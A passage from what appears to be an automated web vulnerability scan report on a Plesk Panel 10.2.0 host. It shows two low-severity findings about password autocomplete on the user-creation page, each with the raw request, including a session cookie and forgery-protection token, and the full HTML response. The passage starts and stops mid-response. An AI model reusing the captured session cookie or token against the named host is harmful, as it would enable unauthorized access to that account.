applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:36 GMT
Connection: close
Content-Length: 23628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create User Account - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fcreate' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create User Account</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'></span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'Panel Preferences',
applyTo: 'general-account'
});
});
//]]>
</script>


<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/user/list"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="3e86204e9517123c7f585d736d64aa3f" id="form_forgery_protection_token" /></form>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.FormAjax({
applyTo: 'form-user',
waitButtonTitle: 'Please wait'
})
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

6.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create/

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /smb/user/create/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:02 GMT
Connection: close
Content-Length: 23631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Create User Account - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/user/action-name/create" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fuser%2Fcreate%2F' + '&activeModule=' + 'users' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"active","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/user/list">
<span>Up Level</span>
</a>
</div>
<h2><span>Create User Account</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Smb.UserEditForm = Class.create({

initialize: function(config) {

if (!$('general-account-loginString')) {
return;
}

if ($('general-vcard-email-emailType-internal')) {
$('general-vcard-email-emailType-internal').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-internalEmail')) {
$('general-vcard-email-internalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-internalEmail').observe('change', this._generateLogin.bind(this));
}
if ($('general-vcard-email-domain')) {
$('general-vcard-email-domain').observe('change', this._generateLogin.bind(this));
}

if ($('general-vcard-email-emailType-external')) {
$('general-vcard-email-emailType-external').observe('click', this._generateLogin.bind(this));
}
if ($('general-vcard-email-externalEmail')) {
$('general-vcard-email-externalEmail').observe('keyup', this._generateLogin.bind(this));
$('general-vcard-email-externalEmail').observe('change', this._generateLogin.bind(this));
}
},

_generateLogin: function() {
if ($('general-vcard-email-emailType-internal') && $('general-vcard-email-emailType-internal').checked) {
var loginString = $('general-vcard-email-internalEmail').value;
if ('' == loginString) {
//empty username
} else
if ($('general-vcard-email-domain')) {
loginString += '@' + $('general-vcard-email-domain').options[$('general-vcard-email-domain').selectedIndex].text;
} else {
loginString += '@' + $('general-vcard-email-internalEmail-domain').innerHTML;
}
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-emailType-external') && $('general-vcard-email-emailType-external').checked) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
} else if ($('general-vcard-email-externalEmail')) {
var loginString = $('general-vcard-email-externalEmail').value;
$('general-account-loginString').update(loginString);
}
}
});

Jsw.onReady(function() {
new Smb.UserEditForm();
});
//]]>
</script><form id="form-user" enctype="application/x-www-form-urlencoded" action="" method="post">


<div id='general-vcard' class='form-box' >
<div id='general-vcard-content-area'>
<div id='general-vcard-contactName-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-contactName'>Contact name&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="general[vcard][contactName]" id="general-vcard-contactName" value="" class="f-middle-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div class="form-row">
<div class='field-name'>
<label for='general-vcard-email-emailType'>E-mail address which is also used as a username for logging in to the Panel&nbsp;</label> <span class="required">*</span>
</div>
<div class="field-value">
<div class="text-value">
<div class="indent-box">

<span><input type="radio" class="radio"
value="internal"
id="general-vcard-email-emailType-internal"
name="general[vcard][email][emailType]"
checked="checked" /></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-internal">Create an e-mail address under your account</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][internalEmail]" id="general-vcard-email-internalEmail" value="" class="input-text" /> @<span id='general-vcard-email-internalEmail-domain'>vulnerable.host.fqdn</span></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
<div class="indent-box">

<span><input type="radio" class="radio"
value="external"
id="general-vcard-email-emailType-external"
name="general[vcard][email][emailType]"
/></span>

<div class="indent-box-content">
<label for="general-vcard-email-emailType-external">Use an external e-mail address</label>
<div class='form-row'>
<div>
<input type="text" name="general[vcard][email][externalEmail]" id="general-vcard-email-externalEmail" value="" class="f-middle-size input-text" disabled="1" /></div>
<span class='field-errors'>
</span>
</div>
</div>

</div>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Smb.UserEmailForm = Class.create({

initialize: function(config) {
this._prefix = config['prefix'];
this._internalEmailId = this._prefix + config['internalEmailId'];
this._internalEmailElements = config['internalEmailElements'];
this._externalEmailId = this._prefix + config['externalEmailId'];
this._externalEmailElements = config['externalEmailElements'];
$(this._internalEmailId).observe('click', this._internalEmailOnClick.bind(this));
$(this._externalEmailId).observe('click', this._externalEmailOnClick.bind(this));
if ($(this._internalEmailId).checked) {
this._internalEmailOnClick();
} else {
   this._externalEmailOnClick();
}
},

_internalEmailOnClick: function() {
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
},

_externalEmailOnClick: function() {
this._internalEmailElements.each(function(elementId) {
$(this._prefix + elementId).disable();
}, this);
this._externalEmailElements.each(function(elementId) {
$(this._prefix + elementId).enable();
}, this);
}
});

Jsw.onReady(function() {
new Smb.UserEmailForm({
prefix: 'general-vcard-email-',
internalEmailId: 'emailType-internal',
internalEmailElements: ['internalEmail'
],
externalEmailId: 'emailType-external',
externalEmailElements: ['externalEmail']
});

});
//]]>
</script>


<div id='general-vcard-roleId-form-row' class='form-row' >
<div class='field-name'><label for='general-vcard-roleId'>User role&nbsp;</label></div>
<div class='field-value'>

<select name="general[vcard][roleId]" id="general-vcard-roleId">
<option value="5" label="Owner">Owner</option>
<option value="6" label="WebMaster">WebMaster</option>
<option value="7" label="Application User" selected="selected">Application User</option>
<option value="8" label="Accountant">Accountant</option>
</select>
<span class='field-errors' style="display:none;"></span>
<span class="hint">User roles grant users administrative privileges and access to applications that you selected for the role.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: 'General Information',
applyTo: 'general-vcard'
});
});
//]]>
</script>


<div id='general-account' class='form-box' >
<div id='general-account-content-area'>

<div class='form-row'>
<div class='field-name'><label for='general-account-loginString'>Username&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-account-loginString'></span>

</div>
</div>
</div>
<div id='general-account-password-form-row' class='form-row' >
<div class='field-name'><label for='general-account-password'>Password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][password]" id="general-account-password" value="" class="input-text" autocomplete="off" />
<span class='field-errors' style="display:none;"></span>

</div>
</div><script type='text/javascript'>
Jsw.onReady(function() {
var pswd = $('general-account-password');
new Jsw.PasswordMeter({
renderTo: 'general-account-password',
renderMode: 'after',
observe: 'general-account-password',
locale: {"title":"Password Strength","description":"To improve your password: ","passwordTooShort":"Make the password longer.","lettersLowerCase":"Use at least one lower-case character.","lettersUpperCase":"Use at least one upper-case character.","numbers1":"Use at least one number.","numbers3":"Use at least three numbers.","specialChar1":"Use at least one special character (for example: !, @, #, $, % ,^, &, *, ?, _, ~).","specialChar2":"Use at least two special characters (for example: !, @, #, $, %, ^, &, *, ?, _, ~).","comboUpperAndLower":"Use both upper and lower-case characters.","comboLettersAndNumbers":"Use both numbers and characters.","comboLettersNumbersSpecial":"Use numbers, characters and special characters.","yourPasswordIsStrong":"Your password is strong, but you can make it even stronger by increasing its length.","verdictNone":"Very weak","verdictVeryWeak":"Very weak","verdictWeak":"Weak","verdictMediocre":"Medium","verdictStrong":"Strong","verdictStronger":"Very strong"}
}).render();
});</script>
<div id='general-account-passwordConfirmation-form-row' class='form-row' >
<div class='field-name'><label for='general-account-passwordConfirmation'>Confirm password&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="password" name="general[account][passwordConfirmation]" id="general-account-passwordConfirmation" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>

<div class='form-row'>
<div class='single-row'>
<div class='indent-box'>

<input type="hidden" name="general[account][isActive]" value="0" /><input type="checkbox" name="general[account][isActive]" id="general-account-isActive" value="1" checked="checked" class="checkbox" />
<div class='indent-box-content'>
<label for='general-account-isActive'>User is active&nbsp;</label>
<span class="hint">Active users can access the Panel.</span>
</div>
</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
